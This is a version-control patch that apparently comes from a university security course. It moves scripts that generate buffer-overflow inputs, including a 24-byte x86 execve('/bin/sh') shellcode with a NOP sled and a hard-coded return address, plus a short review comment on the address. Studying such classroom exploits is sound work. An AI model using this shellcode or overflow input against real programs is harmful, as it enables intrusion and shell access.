# HG changeset patch
# User Christian Urban
# Date 1412432192 -3600
# Node ID f7a9837a63b83e2a6b2472dc94ecdc4732d7baa3
# Parent 17852f5397fdd19faa43219109d7758c3a75bfd3
moved arguments back
diff -r 17852f5397fd -r f7a9837a63b8 Attic/programs/args2-bad
--- a/Attic/programs/args2-bad Sat Oct 04 15:07:26 2014 +0100
+++ /dev/null Thu Jan 01 00:00:00 1970 +0000
@@ -1,3 +0,0 @@
-#!/bin/sh
-
-perl -e 'print "test\nAAAAAAAABBBB\xc8\x84\x04\x08\n"'
\ No newline at end of file
diff -r 17852f5397fd -r f7a9837a63b8 Attic/programs/args2-good
--- a/Attic/programs/args2-good Sat Oct 04 15:07:26 2014 +0100
+++ /dev/null Thu Jan 01 00:00:00 1970 +0000
@@ -1,3 +0,0 @@
-#!/bin/sh
-
-perl -e 'print "test\ntest\n"'
\ No newline at end of file
diff -r 17852f5397fd -r f7a9837a63b8 Attic/programs/args3
--- a/Attic/programs/args3 Sat Oct 04 15:07:26 2014 +0100
+++ /dev/null Thu Jan 01 00:00:00 1970 +0000
@@ -1,28 +0,0 @@
-#!/bin/sh
-
-# shellscript that overwrites the buffer with
-# some payload for opening a shell (the payload
-# cannot contain any \x00)
-
-
-shellcode="\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x99\x52\x53\x89\xe1\xb0\x0b\xcd\x80"
-
-# 24 bytes of shellcode
-
-# "\x31\xc0" // xorl %eax,%eax
-# "\x50" // pushl %eax
-# "\x68\x6e\x2f\x73\x68" // pushl $0x68732f6e
-# "\x68\x2f\x2f\x62\x69" // pushl $0x69622f2f
-# "\x89\xe3" // movl %esp,%ebx
-# "\x99" // cltd
-# "\x52" // pushl %edx
-# "\x53" // pushl %ebx
-# "\x89\xe1" // movl %esp,%ecx
-# "\xb0\x0b" // movb $0xb,%al
-# "\xcd\x80" // int $0x80
-
-padding=`perl -e 'print "\x90" x 80'`
-
-# need s correct address in order to run
-printf $shellcode$padding"\xe8\xf8\xff\xbf\x00\x00\x00\x00"
-
diff -r 17852f5397fd -r f7a9837a63b8 progs/args2-bad
--- /dev/null Thu Jan 01 00:00:00 1970 +0000
+++ b/progs/args2-bad Sat Oct 04 15:16:32 2014 +0100
@@ -0,0 +1,3 @@
+#!/bin/sh
+
+perl -e 'print "test\nAAAAAAAABBBB\xc8\x84\x04\x08\n"'
\ No newline at end of file
diff -r 17852f5397fd -r f7a9837a63b8 progs/args2-good
--- /dev/null Thu Jan 01 00:00:00 1970 +0000
+++ b/progs/args2-good Sat Oct 04 15:16:32 2014 +0100
@@ -0,0 +1,3 @@
+#!/bin/sh
+
+perl -e 'print "test\ntest\n"'
\ No newline at end of file
diff -r 17852f5397fd -r f7a9837a63b8 progs/args3
--- /dev/null Thu Jan 01 00:00:00 1970 +0000
+++ b/progs/args3 Sat Oct 04 15:16:32 2014 +0100
@@ -0,0 +1,28 @@
+#!/bin/sh
+
+# shellscript that overwrites the buffer with
+# some payload for opening a shell (the payload
+# cannot contain any \x00)
+
+
+shellcode="\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x99\x52\x53\x89\xe1\xb0\x0b\xcd\x80"
+
+# 24 bytes of shellcode
+
+# "\x31\xc0" // xorl %eax,%eax
+# "\x50" // pushl %eax
+# "\x68\x6e\x2f\x73\x68" // pushl $0x68732f6e
+# "\x68\x2f\x2f\x62\x69" // pushl $0x69622f2f
+# "\x89\xe3" // movl %esp,%ebx
+# "\x99" // cltd
+# "\x52" // pushl %edx
+# "\x53" // pushl %ebx
+# "\x89\xe1" // movl %esp,%ecx
+# "\xb0\x0b" // movb $0xb,%al
+# "\xcd\x80" // int $0x80
+
+padding=`perl -e 'print "\x90" x 80'`
+
+# need s correct address in order to run
+printf $shellcode$padding"\xe8\xf8\xff\xbf\x00\x00\x00\x00"
+
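Review bot: The comment above the final `printf` in progs/args3, `# need s correct address in order to run`, has a typo and does not say what the address is tied to. The four bytes `\xe8\xf8\xff\xbf` are a fixed stack address written into the script, so the demonstration only holds for the one build and environment it was measured on, presumably the course's lab binary with address randomisation switched off. I would reword it to `# needs the correct return address for the target build; the value below is hard-coded` and add a header line naming the program this input is meant for. Apart from that the file looks like a byte-for-byte move of Attic/programs/args3, so nothing else changes here.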